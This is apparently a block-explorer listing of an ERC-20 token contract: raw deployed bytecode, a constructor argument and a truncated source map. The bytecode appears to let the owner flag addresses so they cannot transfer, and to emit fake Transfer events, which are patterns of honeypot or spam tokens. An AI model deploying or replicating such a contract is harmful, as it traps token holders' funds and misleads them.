72656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006119c5602583611305565b91506119d082611969565b604082019050919050565b600060208201905081810360008301526119f4816119b8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a57602683611305565b9150611a62826119fb565b604082019050919050565b60006020820190508181036000830152611a8681611a4a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ae9602483611305565b9150611af482611a8d565b604082019050919050565b60006020820190508181036000830152611b1881611adc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b7b602283611305565b9150611b8682611b1f565b604082019050919050565b60006020820190508181036000830152611baa81611b6e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611be7602083611305565b9150611bf282611bb1565b602082019050919050565b60006020820190508181036000830152611c1681611bda565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c53601b83611305565b9150611c5e82611c1d565b602082019050919050565b60006020820190508181036000830152611c8281611c46565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611ce5602583611305565b9150611cf082611c89565b604082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d77602383611305565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e09602683611305565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e9b602183611305565b9150611ea682611e3f565b604082019050919050565b60006020820190508181036000830152611eca81611e8e565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f2d602283611305565b9150611f3882611ed1565b604082019050919050565b60006020820190508181036000830152611f5c81611f20565b905091905056fea264697066735822122003781ff36837c1da1f0e380c898dadba5f010e928a48155894994f24fef0726764736f6c634300081300330000000000000000000000007ecb4533e195c088f06b71fae320fa8e02b2a91a
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c80634e99dea8116100a257806395d89b411161007157806395d89b41146102e1578063a457c2d7146102ff578063a9059cbb1461032f578063dd62ed3e1461035f578063f2fde38b1461038f57610116565b80634e99dea81461025957806370a0823114610289578063715018a6146102b95780638da5cb5b146102c357610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780633a61363a1461022157806342966c681461023d57610116565b806306fdde031461011b578063095ea7b3146101395780631186b8d81461016957806318160ddd14610185575b600080fd5b6101236103ab565b604051610130919061138a565b60405180910390f35b610153600480360381019061014e919061144a565b61043d565b60405161016091906114a5565b60405180910390f35b610183600480360381019061017e9190611551565b61045b565b005b61018d610508565b60405161019a91906115c0565b60405180910390f35b6101bd60048036038101906101b891906115db565b610512565b6040516101ca91906114a5565b60405180910390f35b6101db61060a565b6040516101e8919061164a565b60405180910390f35b61020b6004803603810190610206919061144a565b610613565b60405161021891906114a5565b60405180910390f35b61023b60048036038101906102369190611665565b6106bf565b005b610257600480360381019061025291906116d9565b61077b565b005b610273600480360381019061026e9190611706565b610797565b60405161028091906114a5565b60405180910390f35b6102a3600480360381019061029e9190611706565b6107ed565b6040516102b091906115c0565b60405180910390f35b6102c1610836565b005b6102cb61084a565b6040516102d89190611742565b60405180910390f35b6102e9610874565b6040516102f6919061138a565b60405180910390f35b6103196004803603810190610314919061144a565b610906565b60405161032691906114a5565b60405180910390f35b6103496004803603810190610344919061144a565b6109f1565b60405161035691906114a5565b60405180910390f35b6103796004803603810190610374919061175d565b610a0f565b60405161038691906115c0565b60405180910390f35b6103a960048036038101906103a49190611706565b610a96565b005b6060600580546103ba906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546103e6906117cc565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610b19565b8484610b21565b6001905092915050565b610463610cea565b60005b83839050811015610502578160036000868685818110610489576104886117fd565b5b905060200201602081019061049e9190611706565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104fa9061185b565b915050610466565b50505050565b6000600854905090565b600061051f848484610d7e565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061056a610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105e190611915565b60405180910390fd5b6105fe856105f6610b19565b858403610b21565b60019150509392505050565b60006009905090565b60006106b5610620610b19565b84846004600061062e610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106b09190611935565b610b21565b6001905092915050565b6106c7610cea565b60005b84849050811015610774578484828181106106e8576106e76117fd565b5b90506020020160208101906106fd9190611706565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161075991906115c0565b60405180910390a3808061076c9061185b565b9150506106ca565b5050505050565b610783610cea565b61079461078e610b19565b8261108d565b50565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61083e610cea565b6108486000611234565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610883906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546108af906117cc565b80156108fc5780601f106108d1576101008083540402835291602001916108fc565b820191906000526020600020905b8154815290600101906020018083116108df57829003601f168201915b5050505050905090565b60008060046000610915610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156109d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109c9906119db565b60405180910390fd5b6109e66109dd610b19565b85858403610b21565b600191505092915050565b6000610a056109fe610b19565b8484610d7e565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a9e610cea565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0490611a6d565b60405180910390fd5b610b1681611234565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8790611aff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf690611b91565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cdd91906115c0565b60405180910390a3505050565b600080610cf5610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610d7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7390611bfd565b60405180910390fd5b565b60008111610dc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db890611c69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2790611cfb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9690611d8d565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610f26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1d90611e1f565b60405180910390fd5b600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610f865760008214610f8557600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461101b9190611935565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161107f91906115c0565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f390611eb1565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611183576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117a90611f43565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161122791906115c0565b60405180910390a3505050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611334578082015181840152602081019050611319565b60008484015250505050565b6000601f19601f8301169050919050565b600061135c826112fa565b6113668185611305565b9350611376818560208601611316565b61137f81611340565b840191505092915050565b600060208201905081810360008301526113a48184611351565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113e1826113b6565b9050919050565b6113f1816113d6565b81146113fc57600080fd5b50565b60008135905061140e816113e8565b92915050565b6000819050919050565b61142781611414565b811461143257600080fd5b50565b6000813590506114448161141e565b92915050565b60008060408385031215611461576114606113ac565b5b600061146f858286016113ff565b925050602061148085828601611435565b9150509250929050565b60008115159050919050565b61149f8161148a565b82525050565b60006020820190506114ba6000830184611496565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126114e5576114e46114c0565b5b8235905067ffffffffffffffff811115611502576115016114c5565b5b60208301915083602082028301111561151e5761151d6114ca565b5b9250929050565b61152e8161148a565b811461153957600080fd5b50565b60008135905061154b81611525565b92915050565b60008060006040848603121561156a576115696113ac565b5b600084013567ffffffffffffffff811115611588576115876113b1565b5b611594868287016114cf565b935093505060206115a78682870161153c565b9150509250925092565b6115ba81611414565b82525050565b60006020820190506115d560008301846115b1565b92915050565b6000806000606084860312156115f4576115f36113ac565b5b6000611602868287016113ff565b9350506020611613868287016113ff565b925050604061162486828701611435565b9150509250925092565b600060ff82169050919050565b6116448161162e565b82525050565b600060208201905061165f600083018461163b565b92915050565b6000806000806060858703121561167f5761167e6113ac565b5b600085013567ffffffffffffffff81111561169d5761169c6113b1565b5b6116a9878288016114cf565b945094505060206116bc878288016113ff565b92505060406116cd87828801611435565b91505092959194509250565b6000602082840312156116ef576116ee6113ac565b5b60006116fd84828501611435565b91505092915050565b60006020828403121561171c5761171b6113ac565b5b600061172a848285016113ff565b91505092915050565b61173c816113d6565b82525050565b60006020820190506117576000830184611733565b92915050565b60008060408385031215611774576117736113ac565b5b6000611782858286016113ff565b9250506020611793858286016113ff565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806117e457607f821691505b6020821081036117f7576117f661179d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061186682611414565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118985761189761182c565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006118ff602883611305565b915061190a826118a3565b604082019050919050565b6000602082019050818103600083015261192e816118f2565b9050919050565b600061194082611414565b915061194b83611414565b92508282019050808211156119635761196261182c565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006119c5602583611305565b91506119d082611969565b604082019050919050565b600060208201905081810360008301526119f4816119b8565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a57602683611305565b9150611a62826119fb565b604082019050919050565b60006020820190508181036000830152611a8681611a4a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611ae9602483611305565b9150611af482611a8d565b604082019050919050565b60006020820190508181036000830152611b1881611adc565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b7b602283611305565b9150611b8682611b1f565b604082019050919050565b60006020820190508181036000830152611baa81611b6e565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611be7602083611305565b9150611bf282611bb1565b602082019050919050565b60006020820190508181036000830152611c1681611bda565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74207a65726f0000000000600082015250565b6000611c53601b83611305565b9150611c5e82611c1d565b602082019050919050565b60006020820190508181036000830152611c8281611c46565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611ce5602583611305565b9150611cf082611c89565b604082019050919050565b60006020820190508181036000830152611d1481611cd8565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d77602383611305565b9150611d8282611d1b565b604082019050919050565b60006020820190508181036000830152611da681611d6a565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611e09602683611305565b9150611e1482611dad565b604082019050919050565b60006020820190508181036000830152611e3881611dfc565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b6000611e9b602183611305565b9150611ea682611e3f565b604082019050919050565b60006020820190508181036000830152611eca81611e8e565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e60008201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b6000611f2d602283611305565b9150611f3882611ed1565b604082019050919050565b60006020820190508181036000830152611f5c81611f20565b905091905056fea264697066735822122003781ff36837c1da1f0e380c898dadba5f010e928a48155894994f24fef0726764736f6c63430008130033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000007ecb4533e195c088f06b71fae320fa8e02b2a91a
-----Decoded View---------------
Arg [0] : _reserve (address): 0x7ECb4533E195C088F06b71FaE320FA8E02b2A91A
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000007ecb4533e195c088f06b71fae320fa8e02b2a91a
Deployed Bytecode Sourcemap
141:8476:4:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1147:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2480:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;635:196;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1764:102;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3819:426;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1568:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5266:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8429:185;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7766:92;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6405:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2044:121;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1171:103:3;;;:::i;:::-;;940:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1346:98:4;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4563:370;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3330:165;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2917:133;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1282:201:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1147:94:4;1201:13;1230:5;1223:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1147:94;:::o;2480:149::-;2558:4;2571:34;2580:12;:10;:12::i;:::-;2594:2;2598:6;2571:8;:34::i;:::-;2619:4;2612:11;;2480:149;;;;:::o;635:196::-;899:13:3;:11;:13::i;:::-;720:9:4::1;715:111;739:4;;:11;;735:1;:15;715:111;;;815:3;772:31;:40;804:4;;809:1;804:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;772:40;;;;;;;;;;;;;;;;:46;;;;;;;;;;;;;;;;;;752:3;;;;;:::i;:::-;;;;715:111;;;;635:196:::0;;;:::o;1764:102::-;1825:7;1848:12;;1841:19;;1764:102;:::o;3819:426::-;3925:4;3938:36;3948:6;3956:9;3967:6;3938:9;:36::i;:::-;3983:24;4010:11;:19;4022:6;4010:19;;;;;;;;;;;;;;;:33;4030:12;:10;:12::i;:::-;4010:33;;;;;;;;;;;;;;;;3983:60;;4078:6;4058:16;:26;;4050:79;;;;;;;;;;;;:::i;:::-;;;;;;;;;4155:57;4164:6;4172:12;:10;:12::i;:::-;4205:6;4186:16;:25;4155:8;:57::i;:::-;4235:4;4228:11;;;3819:426;;;;;:::o;1568:94::-;1626:5;469:1;1640:16;;1568:94;:::o;5266:190::-;5349:4;5362:70;5371:12;:10;:12::i;:::-;5385:2;5421:10;5389:11;:25;5401:12;:10;:12::i;:::-;5389:25;;;;;;;;;;;;;;;:29;5415:2;5389:29;;;;;;;;;;;;;;;;:42;;;;:::i;:::-;5362:8;:70::i;:::-;5446:4;5439:11;;5266:190;;;;:::o;8429:185::-;899:13:3;:11;:13::i;:::-;8523:9:4::1;8518:91;8542:4;;:11;;8538:1;:15;8518:91;;;8588:4;;8593:1;8588:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;8576:25;;8585:1;8576:25;;;8597:3;8576:25;;;;;;:::i;:::-;;;;;;;;8555:3;;;;;:::i;:::-;;;;8518:91;;;;8429:185:::0;;;;:::o;7766:92::-;899:13:3;:11;:13::i;:::-;7825:27:4::1;7831:12;:10;:12::i;:::-;7845:6;7825:5;:27::i;:::-;7766:92:::0;:::o;6405:119::-;6459:4;6479:31;:39;6511:6;6479:39;;;;;;;;;;;;;;;;;;;;;;;;;6472:46;;6405:119;;;:::o;2044:121::-;2118:7;2141:9;:18;2151:7;2141:18;;;;;;;;;;;;;;;;2134:25;;2044:121;;;:::o;1171:103:3:-;899:13;:11;:13::i;:::-;1236:30:::1;1263:1;1236:18;:30::i;:::-;1171:103::o:0;940:87::-;986:7;1013:6;;;;;;;;;;;1006:13;;940:87;:::o;1346:98:4:-;1402:13;1431:7;1424:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1346:98;:::o;4563:370::-;4651:4;4664:24;4691:11;:25;4703:12;:10;:12::i;:::-;4691:25;;;;;;;;;;;;;;;:29;4717:2;4691:29;;;;;;;;;;;;;;;;4664:56;;4755:15;4735:16;:35;;4727:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;4838:62;4847:12;:10;:12::i;:::-;4861:2;4884:15;4865:16;:34;4838:8;:62::i;:::-;4923:4;4916:11;;;4563:370;;;;:::o;3330:165::-;3416:4;3429:42;3439:12;:10;:12::i;:::-;3453:9;3464:6;3429:9;:42::i;:::-;3485:4;3478:11;;3330:165;;;;:::o;2917:133::-;3000:7;3023:11;:17;3035:4;3023:17;;;;;;;;;;;;;;;:21;3041:2;3023:21;;;;;;;;;;;;;;;;3016:28;;2917:133;;;;:::o;1282:201:3:-;899:13;:11;:13::i;:::-;1391:1:::1;1371:22;;:8;:22;;::::0;1363:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;1447:28;1466:8;1447:18;:28::i;:::-;1282:201:::0;:::o;646:98:0:-;699:7;726:10;719:17;;646:98;:::o;8116:304:4:-;8224:1;8208:18;;:4;:18;;;8200:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;8296:1;8282:16;;:2;:16;;;8274:63;;;;;;;;;;;;:::i;:::-;;;;;;;;;8370:6;8346:11;:17;8358:4;8346:17;;;;;;;;;;;;;;;:21;8364:2;8346:21;;;;;;;;;;;;;;;:30;;;;8403:2;8388:26;;8397:4;8388:26;;;8407:6;8388:26;;;;;;:::i;:::-;;;;;;;;8116:304;;;:::o;1035:128:3:-;1099:5;:19;1105:12;:10;:12::i;:::-;1099:19;;;;;;;;;;;;;;;;;;;;;;;;;1091:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;1035:128::o;5712:685:4:-;5823:1;5814:6;:10;5806:50;;;;;;;;;;;;:::i;:::-;;;;;;;;;5889:1;5871:20;;:6;:20;;;5863:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;5969:1;5948:23;;:9;:23;;;5940:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;6020:21;6044:9;:17;6054:6;6044:17;;;;;;;;;;;;;;;;6020:41;;6093:6;6076:13;:23;;6068:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;6152:31;:39;6184:6;6152:39;;;;;;;;;;;;;;;;;;;;;;;;;6149:82;;;6221:1;6211:6;:11;6203:20;;;;;;6149:82;6292:6;6276:13;:22;6256:9;:17;6266:6;6256:17;;;;;;;;;;;;;;;:42;;;;6336:6;6312:9;:20;6322:9;6312:20;;;;;;;;;;;;;;;;:30;;;;;;;:::i;:::-;;;;;;;;6373:9;6356:35;;6365:6;6356:35;;;6384:6;6356:35;;;;;;:::i;:::-;;;;;;;;5799:598;5712:685;;;:::o;7199:407::-;7302:1;7283:21;;:7;:21;;;7275:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;7355:22;7380:9;:18;7390:7;7380:18;;;;;;;;;;;;;;;;7355:43;;7435:6;7417:14;:24;;7409:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;7540:6;7523:14;:23;7502:9;:18;7512:7;7502:18;;;;;;;;;;;;;;;:44;;;;7589:1;7563:37;;7572:7;7563:37;;;7593:6;7563:37;;;;;;:::i;:::-;;;;;;;;7264:342;7199:407;;:::o;1491:191:3:-;1565:16;1584:6;;;;;;;;;;;1565:25;;1610:8;1601:6;;:17;;;;;;;;;;;;;;;;;;1665:8;1634:40;;1655:8;1634:40;;;;;;;;;;;;1554:128;1491:191;:::o;7:99:5:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:117::-;3555:1;3552;3545:12;3569:117;3678:1;3675;3668:12;3692:117;3801:1;3798;3791:12;3832:568;3905:8;3915:6;3965:3;3958:4;3950:6;3946:17;3942:27;3932:122;;3973:79;;:::i;:::-;3932:122;4086:6;4073:20;4063:30;;4116:18;4108:6;4105:30;4102:117;;;4138:79;;:::i;:::-;4102:117;4252:4;4244:6;4240:17;4228:29;;4306:3;4298:4;4290:6;4286:17;4276:8;4272:32;4269:41;4266:128;;;4313:79;;:::i;:::-;4266:128;3832:568;;;;;:::o;4406:116::-;4476:21;4491:5;4476:21;:::i;:::-;4469:5;4466:32;4456:60;;4512:1;4509;4502:12;4456:60;4406:116;:::o;4528:133::-;4571:5;4609:6;4596:20;4587:29;;4625:30;4649:5;4625:30;:::i;:::-;4528:133;;;;:::o;4667:698::-;4759:6;4767;4775;4824:2;4812:9;4803:7;4799:23;4795:32;4792:119;;;4830:79;;:::i;:::-;4792:119;4978:1;4967:9;4963:17;4950:31;5008:18;5000:6;4997:30;4994:117;;;5030:79;;:::i;:::-;4994:117;5143:80;5215:7;5206:6;5195:9;5191:22;5143:80;:::i;:::-;5125:98;;;;4921:312;5272:2;5298:50;5340:7;5331:6;5320:9;5316:22;5298:50;:::i;:::-;5288:60;;5243:115;4667:698;;;;;:::o;5371:118::-;5458:24;5476:5;5458:24;:::i;:::-;5453:3